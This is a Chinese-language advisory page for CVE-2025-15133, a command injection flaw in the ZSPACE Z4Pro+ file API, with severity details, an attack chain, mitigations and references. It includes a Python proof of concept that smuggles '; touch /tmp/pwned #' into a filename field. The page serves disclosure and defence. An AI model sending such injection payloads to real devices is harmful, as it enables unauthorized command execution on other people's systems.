CVE-2025-15133 CVSS 6.3 中危

CVE-2025-15133 ZSPACE Z4Pro+ 命令注入漏洞

披露日期: 2025-12-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15133

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ZSPACE Z4Pro+ 1.0.0440024

漏洞概述

CVE-2025-15133是影响ZSPACE Z4Pro+设备1.0.0440024版本的命令注入漏洞。该漏洞存在于HTTP POST请求处理器中，具体位于/v2/file/safe/close端点的zfilev2_api_CloseSafe函数。攻击者可以通过构造恶意请求，利用该漏洞在受影响设备上执行任意系统命令。由于该漏洞具有低权限要求且可远程利用，攻击者无需用户交互即可发起攻击。CVSS 3.1评分6.3（中等严重性），攻击向量为网络，攻击复杂度低，对机密性、完整性和可用性均造成较低程度影响。该漏洞的利用代码已公开，厂商在漏洞披露早期已收到通知。

技术细节

该命令注入漏洞源于ZSPACE Z4Pro+设备的HTTP POST请求处理模块中对用户输入验证不足。攻击者可以通过向/v2/file/safe/close端点发送精心构造的HTTP POST请求，在zfilev2_api_CloseSafe函数的参数中注入恶意系统命令。由于该函数直接使用未经充分过滤的用户输入构建系统命令字符串，攻击者可以利用命令分隔符（如分号、管道符等）注入额外命令。攻击成功后，攻击者可在设备上执行任意系统命令，获取设备控制权。由于该接口通常无需高权限即可访问（低权限要求），且可通过网络远程触发，构成了严重的安全风险。攻击者可能利用该漏洞进行横向移动、部署恶意软件或窃取敏感数据。

攻击链分析

STEP 1

步骤1

攻击者发现ZSPACE Z4Pro+设备暴露的/v2/file/safe/close API端点

STEP 2

步骤2

攻击者构造包含恶意命令的HTTP POST请求，利用命令分隔符注入任意系统命令

STEP 3

步骤3

zfilev2_api_CloseSafe函数处理请求时，未对用户输入进行充分过滤和验证

STEP 4

步骤4

恶意命令在设备系统层面被执行，攻击者获得命令执行能力

STEP 5

步骤5

攻击者利用获得的权限进行后续恶意活动，如部署后门、窃取数据或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15133 PoC - Command Injection in ZSPACE Z4Pro+
# Target: ZSPACE Z4Pro+ 1.0.0440024
# Endpoint: /v2/file/safe/close

target = "http://target-device:8080"
endpoint = "/v2/file/safe/close"

# Malicious payload with command injection
# Inject command to create a test file or execute arbitrary command
payload = {
    "filename": "; touch /tmp/pwned #"
}

try:
    response = requests.post(
        f"{target}{endpoint}",
        data=payload,
        timeout=10
    )
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

影响范围

ZSPACE Z4Pro+ 1.0.0440024

防御指南

临时缓解措施

在官方补丁发布前，可通过防火墙或访问控制列表限制对/v2/file/safe/close端点的访问，仅允许受信任的IP地址访问该接口。同时监控设备日志，关注异常的系统命令执行行为。建议在网络层面实施分段隔离，将受影响设备放置在独立的隔离区域，防止漏洞被利用后造成更大范围的影响。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15133
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15133
3 Details https://www.cvedetails.com/cve/CVE-2025-15133/
4 VulDB https://vuldb.com/cve/CVE-2025-15133
5 Link https://github.com/LX-66-LX/cve/issues/3
6 Link https://vuldb.com/?ctiid.338511
7 Link https://vuldb.com/?id.338511
8 Link https://vuldb.com/?submit.713887

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表